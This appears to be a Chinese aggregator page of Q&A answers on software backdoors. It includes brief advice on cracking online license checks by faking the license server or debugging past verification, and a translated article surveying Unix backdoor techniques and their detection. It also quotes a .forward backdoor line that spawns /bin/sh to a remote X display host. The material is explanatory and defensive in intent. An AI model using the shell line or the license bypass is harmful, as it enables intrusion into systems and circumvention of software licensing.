今天給各位分享軟件有后門怎么破解的知識(shí)，其中也會(huì)對(duì)軟件去后門進(jìn)行解釋，如果能碰巧解決你現(xiàn)在面臨的問題，別忘了關(guān)注本站，現(xiàn)在開始吧！

本文目錄一覽：

• 1、下了一個(gè)有后門的軟件 要怎么才能去掉呢
• 2、帶有網(wǎng)絡(luò)授權(quán)的軟件一般怎么破解？
• 3、如何去除軟件后門？
• 4、什么是后門?怎么才能發(fā)現(xiàn)一款軟件有后門?

下了一個(gè)有后門的軟件 要怎么才能去掉呢

你看看這個(gè), 　打開“ResScope編輯器”客戶端程序，單擊“文件”菜單，選擇“打開”選項(xiàng)，找到事先準(zhǔn)備的軟件后門程序，然后單擊“打開”按鈕導(dǎo)入，資源欄會(huì)出現(xiàn)軟件內(nèi)部的基本結(jié)構(gòu)。此時(shí)展開里面的1003文件夾，選中其下102選項(xiàng)標(biāo)簽，編輯區(qū)就會(huì)以代碼形式顯示出軟件制作內(nèi)容，但是要想從這茫茫代碼的“海洋”里，找到所插入后門的地址，并非是件容易事。所以這里請(qǐng)單擊“搜索”→“查找”選項(xiàng)，在彈出的“查找文本”對(duì)話框內(nèi)，輸入關(guān)鍵字為http://的網(wǎng)址字符，然后單擊“確定”按鈕，便可快速的在編輯區(qū)內(nèi)，找到所填寫的網(wǎng)址關(guān)鍵字，而后選中其周圍的代碼字符（如圖），單擊鍵盤Delete(刪除鍵)按鈕，將所選中的惡意后門地址即可刪除，最后在單擊上方“保存”按鈕，使其刪除后門的操作生效，這樣在不影響該軟件的正常使用情況下，后門地址已經(jīng)被清除掉，“魚和熊掌”我們不客氣的兼收吧

這雖然是復(fù)制的, 但俄還是盡力了,

帶有網(wǎng)絡(luò)授權(quán)的軟件一般怎么破解？

據(jù)我所知有下面兩種方法：

截取網(wǎng)絡(luò)封包進(jìn)行分析，偽造服務(wù)端，架設(shè)本地服務(wù)端，修改host文件，將原軟件驗(yàn)證服務(wù)器地址指向本機(jī)，進(jìn)行欺騙驗(yàn)證。

調(diào)試程序，跳過驗(yàn)證。

利用h a c k技術(shù)，這個(gè)就不說了，如果有這種技術(shù)那問題就迎刃而解了。

以上的前方法一般只適用于只是進(jìn)行聯(lián)網(wǎng)驗(yàn)證（如用戶名、密碼或注冊(cè)碼等），軟件算法存在軟件中，如果算法存在遠(yuǎn)程服務(wù)器上，那就只能采用第三種方法。

如何去除軟件后門？

木馬殺不掉一般是由于木馬病毒正在運(yùn)行，或者有其他的病毒進(jìn)程守護(hù)，回寫造成的。

如果遇到rootkit這類隱藏性很高的、又釋放驅(qū)動(dòng)的病毒，很難處理。所以要先對(duì)病毒滅活，殺掉活體病毒之后就很容易查殺了。

【解決方案】

請(qǐng)打開360系統(tǒng)急救箱自定義全盤掃描，查殺一遍，查殺完成后重啟電腦。 然后再打開360系統(tǒng)急救箱，選擇修復(fù)功能（修復(fù)選項(xiàng)可全選），立即修復(fù)

360系統(tǒng)急救箱：

360安全衛(wèi)士：

什么是后門?怎么才能發(fā)現(xiàn)一款軟件有后門?

當(dāng)一個(gè)訓(xùn)練有素的程序員設(shè)計(jì)一個(gè)功能較復(fù)雜的軟件時(shí)，都習(xí)慣于先將整個(gè)軟件分割為若干模塊，然后再對(duì)各模塊單獨(dú)設(shè)計(jì)、調(diào)試，而后門則是一個(gè)模塊的秘密入口。在程序開發(fā)期間，后門的存在是為了便于測(cè)試、更改和增強(qiáng)模塊的功能。當(dāng)然，程序員一般不會(huì)把后門記入軟件的說明文檔，因此用戶通常無法了解后門的存在。

/按照正常操作程序，在軟件交付用戶之前，程序員應(yīng)該去掉軟件模塊中的后門，但是，由于程序員的疏忽，或者故意將其留在程序中以便日后可以對(duì)此程序進(jìn)行隱蔽的訪問，方便測(cè)試或維護(hù)已完成的程序等種種原因，實(shí)際上并未去掉。

這樣，后門就可能被程序的作者所秘密使用，也可能被少數(shù)別有用心的人用窮舉搜索法發(fā)現(xiàn)利用。

;url=http%3A//www%2Exiaom%2Ecom/Article%5Fshow%2Easp%3FArticleID%3D4777b=0a=29user=baidu

什么是后門?

從早期的計(jì)算機(jī)入侵者開始,他們就努力發(fā)展能使自己重返被入侵系統(tǒng)的技術(shù)或后門.本文將討論許多常見的后門及其檢測(cè)方法. 更多的焦點(diǎn)放在Unix系統(tǒng)的后門,同時(shí)討論一些未來將會(huì)出現(xiàn)的Windows NT的后門. 本文將描述如何測(cè)定入侵者使用的方法這樣的復(fù)雜內(nèi)容和管理員如何防止入侵者重返的基礎(chǔ)知識(shí). 當(dāng)管理員懂的一旦入侵者入侵后要制止他們是何等之難以后, 將更主動(dòng)于預(yù)防第一次入侵. 本文試圖涉及大量流行的初級(jí)和高級(jí)入侵者制作后門的手法, 但不會(huì)也不可能覆蓋到所有可能的方法.

大多數(shù)入侵者的后門實(shí)現(xiàn)以下二到三個(gè)目的:

即使管理員通過改變所有密碼類似的方法來提高安全性,仍然能再次侵入. 使再次侵入被發(fā)現(xiàn)的可能性減至最低.大多數(shù)后門設(shè)法躲過日志, 大多數(shù)情況下即使入侵者正在使用系統(tǒng)也無法顯示他已在線. 一些情況下, 如果入侵者認(rèn)為管理員可能會(huì)檢測(cè)到已經(jīng)安裝的后門, 他們以系統(tǒng)的 脆弱性作為唯一的后門, 重而反復(fù)攻破機(jī)器. 這也不會(huì)引起管理員的注意. 所以在 這樣的情況下，一臺(tái)機(jī)器的脆弱性是它唯一未被注意的后門.

密碼破解后門

這是入侵者使用的最早也是最老的方法, 它不僅可以獲得對(duì)Unix機(jī)器的訪問, 而且可以通過破解密碼制造后門. 這就是破解口令薄弱的帳號(hào). 以后即使管理員封了入侵者的當(dāng)前帳號(hào),這些新的帳號(hào)仍然可能是重新侵入的后門. 多數(shù)情況下, 入侵者尋找口令薄弱的未使用帳號(hào),然后將口令改的難些. 當(dāng)管理員尋找口令薄弱的帳號(hào)是, 也不會(huì)發(fā)現(xiàn)這些密碼已修改的帳號(hào).因而管理員很難確定查封哪個(gè)帳號(hào).

Rhosts + + 后門

在連網(wǎng)的Unix機(jī)器中,象Rsh和Rlogin這樣的服務(wù)是基于rhosts文件里的主機(jī)名使用簡(jiǎn)單的認(rèn)證方法. 用戶可以輕易的改變?cè)O(shè)置而不需口令就能進(jìn)入. 入侵者只要向可以訪問的某用戶的rhosts文件中輸入"+ +", 就可以允許任何人從任何地方無須口令便能進(jìn)入這個(gè)帳號(hào). 特別當(dāng)home目錄通過NFS向外共享時(shí), 入侵者更熱中于此. 這些帳號(hào)也成了入侵者再次侵入的后門. 許多人更喜歡使用Rsh, 因?yàn)樗ǔＨ鄙偃罩灸芰? 許多管

理員經(jīng)常檢查 "+ +", 所以入侵者實(shí)際上多設(shè)置來自網(wǎng)上的另一個(gè)帳號(hào)的主機(jī)名和用戶名,從而不易被發(fā)現(xiàn).

校驗(yàn)和及時(shí)間戳后門

早期,許多入侵者用自己的trojan程序替代二進(jìn)制文件. 系統(tǒng)管理員便依*時(shí)間戳和系統(tǒng)校驗(yàn)和的程序辨別一個(gè)二進(jìn)制文件是否已被改變, 如Unix里的sum程序. 入侵者又發(fā)展了使trojan文件和原文件時(shí)間戳同步的新技術(shù). 它是這樣實(shí)現(xiàn)的: 先將系統(tǒng)時(shí)鐘撥回到原文件時(shí)間, 然后調(diào)整trojan文件的時(shí)間為系統(tǒng)時(shí)間. 一旦二進(jìn)制trojan文件與原來的精確同步, 就可以把系統(tǒng)時(shí)間設(shè)回當(dāng)前時(shí)間. sum程序是基于CRC校驗(yàn), 很容易

騙過.入侵者設(shè)計(jì)出了可以將trojan的校驗(yàn)和調(diào)整到原文件的校驗(yàn)和的程序. MD5是被大多數(shù)人推薦的,MD5使用的算法目前還沒人能騙過.

Login后門

在Unix里,login程序通常用來對(duì)telnet來的用戶進(jìn)行口令驗(yàn)證. 入侵者獲取login.c的原代碼并修改,使它在比較輸入口令與存儲(chǔ)口令時(shí)先檢查后門口令. 如果用戶敲入后門口令,它將忽視管理員設(shè)置的口令讓你長(zhǎng)驅(qū)直入. 這將允許入侵者進(jìn)入任何帳號(hào),甚至是root.由于后門口令是在用戶真實(shí)登錄并被日志記錄到utmp和wtmp前產(chǎn)生一個(gè)訪問的, 所以入侵者可以登錄獲取shell卻不會(huì)暴露該帳號(hào). 管理員注意到這種后門后, 便

用"strings"命令搜索login程序以尋找文本信息. 許多情況下后門口令會(huì)原形畢露.入侵者就開始加密或者更好的隱藏口令, 使strings命令失效. 所以更多的管理員是用MD5校驗(yàn)和檢測(cè)這種后門的.

Telnetd后門

當(dāng)用戶telnet到系統(tǒng), 監(jiān)聽端口的inetd服務(wù)接受連接隨后遞給in.telnetd,由它運(yùn)行l(wèi)ogin.一些入侵者知道管理員會(huì)檢查login是否被修改, 就著手修改in.telnetd.在in.telnetd內(nèi)部有一些對(duì)用戶信息的檢驗(yàn), 比如用戶使用了何種終端. 典型的終端設(shè)置是Xterm或者VT100.入侵者可以做這樣的后門, 當(dāng)終端設(shè)置為"letmein"時(shí)產(chǎn)生一個(gè)不要任何驗(yàn)證的shell. 入侵者已對(duì)某些服務(wù)作了后門, 對(duì)來自特定源端口的連接產(chǎn)

生一個(gè)shell .

服務(wù)后門

幾乎所有網(wǎng)絡(luò)服務(wù)曾被入侵者作過后門. finger, rsh, rexec, rlogin, ftp, 甚至inetd等等的作了的版本隨處多是. 有的只是連接到某個(gè)TCP端口的shell,通過后門口令就能獲取訪問.這些程序有時(shí)用刺媧□？ucp這樣不用的服務(wù),或者被加入inetd.conf作為一個(gè)新的服務(wù).管理員應(yīng)該非常注意那些服務(wù)正在運(yùn)行, 并用MD5對(duì)原服務(wù)程序做校驗(yàn).

Cronjob后門

Unix上的Cronjob可以按時(shí)間表調(diào)度特定程序的運(yùn)行. 入侵者可以加入后門shell程序使它在1AM到2AM之間運(yùn)行,那么每晚有一個(gè)小時(shí)可以獲得訪問. 也可以查看cronjob中經(jīng)常運(yùn)行的合法程序,同時(shí)置入后門.

庫后門

幾乎所有的UNIX系統(tǒng)使用共享庫. 共享庫用于相同函數(shù)的重用而減少代碼長(zhǎng)度. 一些入侵者在象crypt.c和_crypt.c這些函數(shù)里作了后門. 象login.c這樣的程序調(diào)用了crypt(),當(dāng)使用后門口令時(shí)產(chǎn)生一個(gè)shell. 因此, 即使管理員用MD5檢查login程序,仍然能產(chǎn)生一個(gè)后門函數(shù).而且許多管理員并不會(huì)檢查庫是否被做了后門.對(duì)于許多入侵者來說有一個(gè)問題: 一些管理員對(duì)所有東西多作了MD5校驗(yàn). 有一種辦法是入侵者對(duì)open()和文件訪問函數(shù)做后門. 后門函數(shù)讀原文件但執(zhí)行trojan后門程序. 所以 當(dāng)MD5讀這些文件時(shí),校驗(yàn)和一切正常. 但當(dāng)系統(tǒng)運(yùn)行時(shí)將執(zhí)行trojan版本的. 即使trojan庫本身也可躲過MD5校驗(yàn). 對(duì)于管理員來說有一種方法可以找到后門, 就是靜態(tài)編連MD5校驗(yàn)程序然后運(yùn)行.靜態(tài)連接程序不會(huì)使用trojan共享庫.

內(nèi)核后門

內(nèi)核是Unix工作的核心. 用于庫躲過MD5校驗(yàn)的方法同樣適用于內(nèi)核級(jí)別,甚至連靜態(tài)連接多不能識(shí)別. 一個(gè)后門作的很好的內(nèi)核是最難被管理員查找的, 所幸的是內(nèi)核的后門程序還不是隨手可得, 每人知道它事實(shí)上傳播有多廣.

文件系統(tǒng)后門

入侵者需要在服務(wù)器上存儲(chǔ)他們的掠奪品或數(shù)據(jù),并不能被管理員發(fā)現(xiàn). 入侵者的文章常是包括exploit腳本工具,后門集,sniffer日志,email的備分,原代碼,等等. 有時(shí)為了防止管理員發(fā)現(xiàn)這么大的文件, 入侵者需要修補(bǔ)"ls","du","fsck"以隱匿特定的目錄和文件.在很低的級(jí)別, 入侵者做這樣的漏洞: 以專有的格式在硬盤上割出一部分,且表示為壞的扇區(qū). 因此入侵者只能用特別的工具訪問這些隱藏的文件. 對(duì)于普通的

管理員來說, 很難發(fā)現(xiàn)這些"壞扇區(qū)"里的文件系統(tǒng), 而它又確實(shí)存在.

Boot塊后門

在PC世界里,許多病毒藏匿與根區(qū), 而殺病毒軟件就是檢查根區(qū)是否被改變. Unix下,多數(shù)管理員沒有檢查根區(qū)的軟件, 所以一些入侵者將一些后門留在根區(qū).

隱匿進(jìn)程后門

入侵者通常想隱匿他們運(yùn)行的程序. 這樣的程序一般是口令破解程序和監(jiān)聽程序 (sniffer).有許多辦法可以實(shí)現(xiàn),這里是較通用的: 編寫程序時(shí)修改自己的argv[]使它看起來象其他進(jìn)程名. 可以將sniffer程序改名類似in.syslog再執(zhí)行. 因此當(dāng)管理員用"ps"檢查運(yùn)行進(jìn)程時(shí), 出現(xiàn) 的是標(biāo)準(zhǔn)服務(wù)名. 可以修改庫函數(shù)致使

"ps"不能顯示所有進(jìn)程. 可以將一個(gè)后門或程序嵌入中斷驅(qū)動(dòng)程序使它不會(huì)在進(jìn)程表顯現(xiàn). 使用這個(gè)技術(shù)的一個(gè)后門例子是amod.tar.gz :

也可以修改內(nèi)核隱匿進(jìn)程.

Rootkit

最流行的后門安裝包之一是rootkit. 它很容易用web搜索器找到.從Rootkit的README里,可以找到一些典型的文件:

z2 - removes entries from utmp, wtmp, and lastlog.

Es - rokstar's ethernet sniffer for sun4 based kernels.

Fix - try to fake checksums, install with same dates/perms/u/g.

Sl - become root via a magic password sent to login.

Ic - modified ifconfig to remove PROMISC flag from output.

ps: - hides the processes.

Ns - modified netstat to hide connections to certain machines.

Ls - hides certain directories and files from being listed.

du5 - hides how much space is being used on your hard drive.

ls5 - hides certain files and directories from being listed.

網(wǎng)絡(luò)通行后門

入侵者不僅想隱匿在系統(tǒng)里的痕跡, 而且也要隱匿他們的網(wǎng)絡(luò)通行. 這些網(wǎng)絡(luò)通行后門有時(shí)允許入侵者通過防火墻進(jìn)行訪問. 有許多網(wǎng)絡(luò)后門程序允許入侵者建立某個(gè)端口號(hào)并不用通過普通服務(wù)就能實(shí)現(xiàn)訪問. 因?yàn)檫@是通過非標(biāo)準(zhǔn)網(wǎng)絡(luò)端口的通行, 管理員可能忽視入侵者的足跡. 這種后門通常使用TCP,UDP和ICMP, 但也可能是其他類型報(bào)文.

TCP Shell 后門

入侵者可能在防火墻沒有阻塞的高位TCP端口建立這些TCP Shell后門. 許多情況下,他們用口令進(jìn)行保護(hù)以免管理員連接上后立即看到是shell訪問. 管理員可以用netstat命令查看當(dāng)前的連接狀態(tài), 那些端口在偵聽, 目前連接的來龍去脈. 通常這些后門可以讓入侵者躲過TCP Wrapper技術(shù). 這些后門可以放在SMTP端口, 許多防火墻允許e-mail通行的.

UDP Shell 后門

管理員經(jīng)常注意TCP連接并觀察其怪異情況, 而UDP Shell后門沒有這樣的連接, 所以netstat不能顯示入侵者的訪問痕跡. 許多防火墻設(shè)置成允許類似DNS的UDP報(bào)文的通行. 通常入侵者將UDP Shell放置在這個(gè)端口, 允許穿越防火墻.

ICMP Shell 后門

Ping是通過發(fā)送和接受ICMP包檢測(cè)機(jī)器活動(dòng)狀態(tài)的通用辦法之一. 許多防火墻允許外界ping它內(nèi)部的機(jī)器. 入侵者可以放數(shù)據(jù)入Ping的ICMP包, 在ping的機(jī)器間形成一個(gè)shell通道. 管理員也許會(huì)注意到Ping包暴風(fēng), 但除了他查看包內(nèi)數(shù)據(jù), 否者入侵者不會(huì)暴露.

加密連接

管理員可能建立一個(gè)sniffer試圖某個(gè)訪問的數(shù)據(jù), 但當(dāng)入侵者給網(wǎng)絡(luò)通行后門加密后,就不可能被判定兩臺(tái)機(jī)器間的傳輸內(nèi)容了.

Windows NT

由于Windows NT不能輕易的允許多個(gè)用戶象Unix下訪問一臺(tái)機(jī)器, 對(duì)入侵者來說就很難闖入Windows NT,安裝后門,并從那里發(fā)起攻擊. 因此你將更頻繁地看到廣泛的來自Unix的網(wǎng)絡(luò)攻擊. 當(dāng)Windows NT提高多用戶技術(shù)后, 入侵者將更頻繁地利用 WindowsNT.如果這一天真的到來, 許多Unix的后門技術(shù)將移植到Windows NT上, 管理員可以等候入侵者的到來. 今天, Windows NT已經(jīng)有了telnet守護(hù)程序. 通過網(wǎng)絡(luò)通行后門, 入侵者發(fā)現(xiàn)在Windows NT安裝它們是可行的. ( With Network Traffic

backdoors, theyarevery feasible for intruders to install on Windows NT. 此處該如何翻譯? :(

解決

當(dāng)后門技術(shù)越先進(jìn), 管理員越難于判斷入侵者是否侵入后者他們是否被成功封殺.

評(píng)估

首先要做的是積極準(zhǔn)確的估計(jì)你的網(wǎng)絡(luò)的脆弱性, 從而判定漏洞的存在且修復(fù)之.許多商業(yè)工具用來幫助掃描和查核網(wǎng)絡(luò)及系統(tǒng)的漏洞. 如果僅僅安裝提供商的安全補(bǔ)丁的話,許多公司將大大提高安全性.

MD5基準(zhǔn)線

一個(gè)系統(tǒng)(安全)掃描的一個(gè)重要因素是MD5校驗(yàn)和基準(zhǔn)線. MD5基準(zhǔn)線是在黑客入侵前由干凈系統(tǒng)建立. 一旦黑客入侵并建立了后門再建立基準(zhǔn)線, 那么后門也被合并進(jìn)去了.一些公司被入侵且系統(tǒng)被安置后門長(zhǎng)達(dá)幾個(gè)月.所有的系統(tǒng)備份多包含了后門. 當(dāng)公司發(fā)現(xiàn)有黑客并求助備份祛除后門時(shí), 一切努力是徒勞的, 因?yàn)樗麄兓謴?fù)系統(tǒng)的同時(shí)也恢復(fù)了后門. 應(yīng)該在入侵發(fā)生前作好基準(zhǔn)線的建立.

入侵檢測(cè)

隨著各種組織的上網(wǎng)和允許對(duì)自己某些機(jī)器的連接,入侵檢測(cè)正變的越來越重要.以前多數(shù)入侵檢測(cè)技術(shù)是基于日志型的. 最新的入侵檢測(cè)系統(tǒng)技術(shù)(IDS)是基于實(shí)時(shí)偵聽和網(wǎng)絡(luò)通行安全分析的. 最新的IDS技術(shù)可以瀏覽DNS的UDP報(bào)文, 并判斷是否符合DNS協(xié)議請(qǐng)求. 如果數(shù)據(jù)不符合協(xié)議, 就發(fā)出警告信號(hào)并抓取數(shù)據(jù)進(jìn)行進(jìn)一步分析. 同樣的原則可以運(yùn)用到ICMP包, 檢查數(shù)據(jù)是否符合協(xié)議要求, 或者是否裝載加密shell會(huì)話.

從CD-ROM啟動(dòng)

一些管理員考慮從CD-ROM啟動(dòng)從而消除了入侵者在CD-ROM上做后門的可能性.這種方法的問題是實(shí)現(xiàn)的費(fèi)用和時(shí)間夠企業(yè)面臨的.

警告

由于安全領(lǐng)域變化之快, 每天有新的漏洞被公布, 而入侵者正不斷設(shè)計(jì)新的攻擊和安置后門技術(shù), 安枕無憂的安全技術(shù)是沒有的.請(qǐng)記住沒有簡(jiǎn)單的防御,只有不懈的努力!

( Be aware that no defense is foolproof, and that there is no substitute for

diligent attention. 此句該如何翻譯? :( )

-------------------------------------------------------------------------

you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also

a common method of regaining access. For the account ``username''

a .forward file might be constructed as follows:

\username

|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e

/bin/sh"

permutations of this method include alteration of the systems mail

aliases file (most commonly located at /etc/aliases). Note that

this is a simple permutation, the more advanced can run a simple

script from the forward file that can take arbitrary commands via

stdin (after minor preprocessing).

PS: The above method is also useful gaining access a companies

mailhub (assuming there is a shared a home directory FS on

nbs

the client and server).

Using smrsh can effectively negate this backdoor (although it's quite

possibly still a problem if you allow things like elm's filter or

procmail which can run programs themselves...).

你也許要增加:

.forward后門

Unix下在.forward文件里放入命令是重新獲得訪問的常用方法. 帳戶'username'的.forward可能設(shè)置如下:

\username

|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e/bin/sh"

這種方法的變形包括改變系統(tǒng)的mail的別名文件(通常位于/etc/aliases). 注意這只是一種簡(jiǎn)單的變換. 更為高級(jí)的能夠從.forward中運(yùn)行簡(jiǎn)單腳本實(shí)現(xiàn)在標(biāo)準(zhǔn)輸入執(zhí)行任意命令(小部分預(yù)處理后).利用smrsh可以有效的制止這種后門(雖然如果允許可以自運(yùn)行的elm's filter或 procmail類程序, 很有可能還有問題 ......)

參考資料：zhidao.baidu.com

軟件有后門怎么破解的介紹就聊到這里吧，感謝你花時(shí)間閱讀本站內(nèi)容，更多關(guān)于軟件去后門、軟件有后門怎么破解的信息別忘了在本站進(jìn)行查找喔。